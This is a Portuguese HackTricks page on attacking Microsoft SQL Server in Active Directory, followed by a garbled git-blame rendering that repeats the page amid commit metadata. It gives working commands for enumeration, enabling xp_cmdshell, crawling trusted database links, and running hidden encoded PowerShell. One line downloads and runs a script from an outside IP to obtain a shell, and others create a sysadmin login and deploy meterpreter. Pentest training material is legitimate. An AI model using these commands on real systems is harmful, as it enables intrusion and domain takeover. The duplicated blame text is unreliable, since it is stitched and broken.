hacktricks/windows-hardening/active-directory-methodology/abusing-ad-mssql.md

# MSSQL AD Abuse

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
{% endhint %}

<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>

{% embed url="https://websec.nl/" %}

## **Enumeração / Descoberta MSSQL**

O módulo powershell [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) é muito útil neste caso.
```powershell
Import-Module .\PowerupSQL.psd1
```
### Enumerando a partir da rede sem sessão de domínio
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10

#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
```
### Enumerando de dentro do domínio
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose

#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose

#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```
## MSSQL Abuso Básico

### Acessar DB
```powershell
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"

#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"

# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
```
### MSSQL RCE

Pode também ser possível **executar comandos** dentro do host MSSQL
```powershell
Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
```
Verifique na página mencionada na **seção seguinte como fazer isso manualmente.**

### Truques Básicos de Hacking MSSQL

{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
[pentesting-mssql-microsoft-sql-server](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/)
{% endcontent-ref %}

## Links Confiáveis MSSQL

Se uma instância MSSQL é confiável (link de banco de dados) por uma instância MSSQL diferente. Se o usuário tem privilégios sobre o banco de dados confiável, ele poderá **usar o relacionamento de confiança para executar consultas também na outra instância**. Essas confianças podem ser encadeadas e, em algum momento, o usuário pode ser capaz de encontrar algum banco de dados mal configurado onde ele pode executar comandos.

**Os links entre bancos de dados funcionam mesmo através de confianças de floresta.**

### Abuso do Powershell
```powershell
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0

#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose

#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'

#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"

#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql  -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'

#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"

#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"

#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
```
### Metasploit

Você pode verificar facilmente links confiáveis usando metasploit.
```bash
#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```
Note que o metasploit tentará abusar apenas da função `openquery()` no MSSQL (então, se você não conseguir executar comandos com `openquery()`, precisará tentar o método `EXECUTE` **manualmente** para executar comandos, veja mais abaixo.)

### Manual - Openquery()

A partir do **Linux**, você pode obter um shell de console MSSQL com **sqsh** e **mssqlclient.py.**

A partir do **Windows**, você também pode encontrar os links e executar comandos manualmente usando um **cliente MSSQL como** [**HeidiSQL**](https://www.heidisql.com)

_Faça login usando autenticação do Windows:_

![](<../../.gitbook/assets/image (808).png>)

#### Encontrar Links Confiáveis
```sql
select * from master..sysservers;
EXEC sp_linkedservers;
```
![](<../../.gitbook/assets/image (716).png>)

#### Execute queries in trustable link

Execute queries através do link (exemplo: encontre mais links na nova instância acessível):
```sql
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
```
{% hint style="warning" %}
Verifique onde aspas duplas e simples são usadas, é importante usá-las dessa forma.
{% endhint %}

![](<../../.gitbook/assets/image (643).png>)

Você pode continuar essa cadeia de links confiáveis para sempre manualmente.
```sql
# First level RCE
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')

# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
```
Se você não consegue realizar ações como `exec xp_cmdshell` a partir de `openquery()`, tente com o método `EXECUTE`.

### Manual - EXECUTE

Você também pode abusar de links confiáveis usando `EXECUTE`:
```bash
#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
## Escalação de Privilégios Local

O **usuário local do MSSQL** geralmente possui um tipo especial de privilégio chamado **`SeImpersonatePrivilege`**. Isso permite que a conta "imite um cliente após a autenticação".

Uma estratégia que muitos autores desenvolveram é forçar um serviço do SYSTEM a se autenticar em um serviço malicioso ou man-in-the-middle que o atacante cria. Esse serviço malicioso pode então imitar o serviço do SYSTEM enquanto tenta se autenticar.

[SweetPotato](https://github.com/CCob/SweetPotato) possui uma coleção dessas várias técnicas que podem ser executadas através do comando `execute-assembly` do Beacon.

<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>

{% embed url="https://websec.nl/" %}

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Suporte ao HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
{% endhint %}
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								# MSSQL AD Abuse
 								{% hint style="success" %}
 								Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								<summary>Support HackTricks</summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
 								* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								{% endhint %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

											
										
										
											2024-05-02 15:04:03 +00:00
+								<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
-												Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

											
										
										
											2024-04-07 22:57:51 +00:00
 								{% embed url="https://websec.nl/" %}
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								## **Enumeração / Descoberta MSSQL**
-												Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

											
										
										
											2024-04-07 22:57:51 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:04:08 +00:00
+								O módulo powershell [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) é muito útil neste caso.
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```powershell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Import-Module .\PowerupSQL.psd1
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								### Enumerando a partir da rede sem sessão de domínio
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```powershell
 								# Get local MSSQL instance (if any)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Get-SQLInstanceLocal
 								Get-SQLInstanceLocal | Get-SQLServerInfo
 								#If you don't have a AD account, you can try to find MSSQL scanning via UDP
 								#First, you will need a list of hosts to scan
 								Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10
 								#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
 								#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
 								Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								### Enumerando de dentro do domínio
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```powershell
 								# Get local MSSQL instance (if any)
 								Get-SQLInstanceLocal
 								Get-SQLInstanceLocal | Get-SQLServerInfo
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								#Get info about valid MSQL instances running in domain
 								#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
-												Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u

											
										
										
											2024-02-07 04:39:38 +00:00
+								Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								#Test connections with each one
 								Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
 								#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
 								Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								# Get DBs, test connections and get info in oneliner
 								Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
 								```
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								## MSSQL Abuso Básico
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								### Acessar DB
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```powershell
 								#Perform a SQL query
 								Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								#Dump an instance (a lotof CVSs generated in current dir)
 								Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
-												GitBook: [#3408] No subject

											
										
										
											2022-08-18 23:47:45 +00:00
 								# Search keywords in columns trying to access the MSSQL DBs
 								## This won't use trusted SQL links
 								Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:35:32 +00:00
+								### MSSQL RCE
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								Pode também ser possível **executar comandos** dentro do host MSSQL
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```powershell
-												GitBook: [#3581] No subject

											
										
										
											2022-10-08 08:36:40 +00:00
+								Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
 								```
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								Verifique na página mencionada na **seção seguinte como fazer isso manualmente.**
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								### Truques Básicos de Hacking MSSQL
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

											
										
										
											2024-05-02 15:04:03 +00:00
+								{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
 								[pentesting-mssql-microsoft-sql-server](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/)
 								{% endcontent-ref %}
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								## Links Confiáveis MSSQL
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								Se uma instância MSSQL é confiável (link de banco de dados) por uma instância MSSQL diferente. Se o usuário tem privilégios sobre o banco de dados confiável, ele poderá **usar o relacionamento de confiança para executar consultas também na outra instância**. Essas confianças podem ser encadeadas e, em algum momento, o usuário pode ser capaz de encontrar algum banco de dados mal configurado onde ele pode executar comandos.
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								**Os links entre bancos de dados funcionam mesmo através de confianças de floresta.**
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								### Abuso do Powershell
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```powershell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								#Look for MSSQL links of an accessible instance
 								Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
-												Update the spelling error of a word
											
										
										
											2022-12-20 14:18:39 +00:00
+								#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
 								Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
 								Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
 								#Obtain a shell
 								Get-SQLServerLinkCrawl -Instance dcorp-mssql  -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
 								#Check for possible vulnerabilities on an instance where you have access
 								Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
 								#Try to escalate privileges on an instance
 								Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"
-												GitBook: [#3408] No subject

											
										
										
											2022-08-18 23:47:45 +00:00
 								#Manual trusted link queery
 								Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
-												GitBook: [#3455] No subject

											
										
										
											2022-09-04 09:37:14 +00:00
+								## Enable xp_cmdshell and check it
 								Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
 								Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
 								Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
 								## If you see the results of @@selectname, it worked
 								Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												GitBook: [#3340] No subject

											
										
										
											2022-07-28 09:46:19 +00:00
+								### Metasploit
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								Você pode verificar facilmente links confiáveis usando metasploit.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#Set username, password, windows auth (if using AD), IP...
 								msf> use exploit/windows/mssql/mssql_linkcrawler
 								[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
 								```
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								Note que o metasploit tentará abusar apenas da função `openquery()` no MSSQL (então, se você não conseguir executar comandos com `openquery()`, precisará tentar o método `EXECUTE` **manualmente** para executar comandos, veja mais abaixo.)
-												GitBook: [#3340] No subject

											
										
										
											2022-07-28 09:46:19 +00:00
+								### Manual - Openquery()
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								A partir do **Linux**, você pode obter um shell de console MSSQL com **sqsh** e **mssqlclient.py.**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								A partir do **Windows**, você também pode encontrar os links e executar comandos manualmente usando um **cliente MSSQL como** [**HeidiSQL**](https://www.heidisql.com)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								_Faça login usando autenticação do Windows:_
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:04:08 +00:00
+								![](<../../.gitbook/assets/image (808).png>)
-												Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

											
										
										
											2024-05-02 15:04:03 +00:00
 								#### Encontrar Links Confiáveis
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```sql
-												Translated ['generic-methodologies-and-resources/pentesting-wifi/README.

											
										
										
											2024-03-26 19:22:56 +00:00
+								select * from master..sysservers;
 								EXEC sp_linkedservers;
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:04:08 +00:00
+								![](<../../.gitbook/assets/image (716).png>)
-												Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u

											
										
										
											2024-02-07 04:39:38 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								#### Execute queries in trustable link
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								Execute queries através do link (exemplo: encontre mais links na nova instância acessível):
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```sql
 								select * from openquery("dcorp-sql1", 'select * from master..sysservers')
 								```
 								{% hint style="warning" %}
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								Verifique onde aspas duplas e simples são usadas, é importante usá-las dessa forma.
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								{% endhint %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:04:08 +00:00
+								![](<../../.gitbook/assets/image (643).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Você pode continuar essa cadeia de links confiáveis para sempre manualmente.
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								```sql
 								# First level RCE
 								SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
 								# Second level RCE
 								SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
 								```
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								Se você não consegue realizar ações como `exec xp_cmdshell` a partir de `openquery()`, tente com o método `EXECUTE`.
-												Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

											
										
										
											2024-05-02 15:04:03 +00:00
-												GitBook: [#3340] No subject

											
										
										
											2022-07-28 09:46:19 +00:00
+								### Manual - EXECUTE
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								Você também pode abusar de links confiáveis usando `EXECUTE`:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#Create user and give admin privileges
 								EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
 								EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								## Escalação de Privilégios Local
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								O **usuário local do MSSQL** geralmente possui um tipo especial de privilégio chamado **`SeImpersonatePrivilege`**. Isso permite que a conta "imite um cliente após a autenticação".
-												Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

											
										
										
											2024-04-07 22:57:51 +00:00
-												Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

											
										
										
											2024-07-18 22:06:26 +00:00
+								Uma estratégia que muitos autores desenvolveram é forçar um serviço do SYSTEM a se autenticar em um serviço malicioso ou man-in-the-middle que o atacante cria. Esse serviço malicioso pode então imitar o serviço do SYSTEM enquanto tenta se autenticar.
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
